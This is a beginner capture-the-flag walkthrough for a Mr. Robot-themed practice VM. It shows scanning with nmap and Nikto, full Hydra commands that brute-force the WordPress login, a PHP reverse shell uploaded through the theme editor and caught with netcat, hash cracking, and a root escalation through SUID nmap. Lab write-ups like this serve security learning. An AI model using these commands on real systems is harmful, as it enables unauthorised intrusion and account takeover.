Description from author
Based on the show, Mr. Robot.
This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.
The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.
Information Gathering
Let’s start with a simple port scan.
mkdir scans
nmap -sC -Pn -sV -oA scans/nmap_initial 10.0.2.4
Nothing too interesting, just a webserver running on the background and ssh. Let’s do some further scanning with Nikto.
nikto -h 10.0.2.4 -o scans/nikto.txtWhile Nikto is running, i took the chance to check out the website manually. Searched for common files and folders and found something interesting in /robots.txt!
The 1st out of 3 keys has been found and a .dic file. Let’s quickly grab those with wget. The .dic file contains a lot of duplicates, let’s sort and save it for later use.
cat fsocity.dic| sort -u | uniq > uniq_fsocity.dicIn the meantime our Nikto scan has finished.
WordPress is running in the background. The first thing i do when i know WordPress is installed is run wpscan but nothing too interesting came up. It wasn’t able to enumerate users either.
Luckily for us, we know we can bruteforce user and password in a HTTP form with Hydra. Here is the POST request made when we try to login in /wp-login.php
In the POST request 2 parameters are being used; log and pwd. Let’s run Hydra now that we know this.
hydra -vV -L uniq_fsocity.dic -p jiebs 10.0.2.4 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'After abit of waiting we get the username.
[80][http-post-form] host: 10.0.2.4 login: elliot password: jiebsLet’s try and grab the password with the same .dic file now.
hydra -vV -l elliot -P uniq_fsocity.dic 10.0.2.4 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'Again after a bit of waiting we get the password.
[80][http-post-form] host: 10.0.2.4 login: elliot password: ER28-0652Great, we have the username and password. Let’s log in and start the exploitation part!
Exploitation
After some poking around in the wp admin panel i figured i should try and upload a reverse shell. I got mine from pentestmonkeys, make sure you change the ip and port. Go to Appearance > Editor > 404 Template (404.php) > paste the .php script > click Upload.
Let’s make sure we’re listening to the port.
nc -lvp 1234Once you’re listening to the port lets get our reverse shell going.
curl http://10.0.2.4/404.php
And we have a shell back with the user daemon!
Let’s quickly spawn a TTY shell and start snooping around.
python -c 'import pty; pty.spawn("/bin/sh")'After searching around i found an interesting directory(/home/robot) with the 2nd key!
When trying to cat the 2nd key we get permission denied. So we started looking at the password.raw-md5 file as the name surely does sound interesting.
Great, looks like a password hash for the robot user! I went online and cracked the hash, result: “abcdefghijklmnopqrstuvwxyz”. Let’s go ahead and switch to the robot user.
Great, now let’s see if we can check out the 2nd key now.
Great, now lets move and get root!
Privilege escalation
After going through a bunch of directories and files looking for hints, i started looking at binaries with the SUID bit set.
We can run nmap as root since it’s SUID bit is set. Let’s check out the version. In older versions of nmap you are able to run it in interactive mode and escape to shell. Since the SUID bit is set, we’ll be able to escape to ‘root’ shell.
Let’s check out the root directory for the last flag.
Thanks for reading and happy hacking!
